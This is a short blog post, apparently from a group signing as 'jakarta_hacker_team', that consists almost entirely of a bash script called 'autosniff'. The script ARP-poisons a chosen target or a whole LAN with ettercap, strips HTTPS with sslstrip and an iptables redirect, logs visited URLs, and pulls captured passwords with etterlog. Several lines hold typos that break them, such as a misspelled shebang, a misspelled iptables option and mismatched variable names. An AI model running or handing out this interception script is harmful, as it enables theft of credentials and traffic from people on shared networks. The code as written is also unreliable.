Thursday, February 24, 2011

new autosniff



#|/bin/bash
echo -n "Acces wireshark when finis? If yes, [enter] "
read -e NOYES
echo -n "Do you want to extract pitcures from the pcap via tcptract? If yws, [enter] "
read -e XTRACT
echo -n "Interfaces ? example wlan0: "
read -e IFACE
echo -n "Name of "Session"? (Give Name for folder) : "
read -e SESSION
echo -n "Gateway IP - empty to default: "
read -e ROUTER
echo -n "Target IP - Empty to scan all IP Addres: "
read -e VICTIM
mkdir /root/$SESSION/
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
echo 1 > /proc/sys/net/ipv4/ip_forward
sslstrip -p -k -w /root/$SESSION/$SESSION.log &
iptables -t nat -A PREROUTING -p tcp --destionation-port 80 -j REDIRECT --to-port 10000
urlsnarf -i $IFACE | grep htpp > /root/$Session/$Session.txt &
ettercap -T -i $IFACE -w /root/$SESSION/$SESSION.pcap -L /root/$SESSION/$SESSION -M arp /$SOUTER/ /$VICTIM/
"$XTRACT"tcpxtract -f /root/$SESSION/$SESSION.pcap
"$NOYES"wireshark &
killall sslstrip
killall python
killall urlsnarf
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
etterlog -p -i /root/$SESSION/$SESSION.eci
###
###
## jakarta_hacker_team ##

0 komentar:

Post a Comment

Twitter Delicious Facebook Digg Stumbleupon Favorites More

 
Design by Free WordPress Themes | Bloggerized by Lasantha - Premium Blogger Themes | Sweet Tomatoes Printable Coupons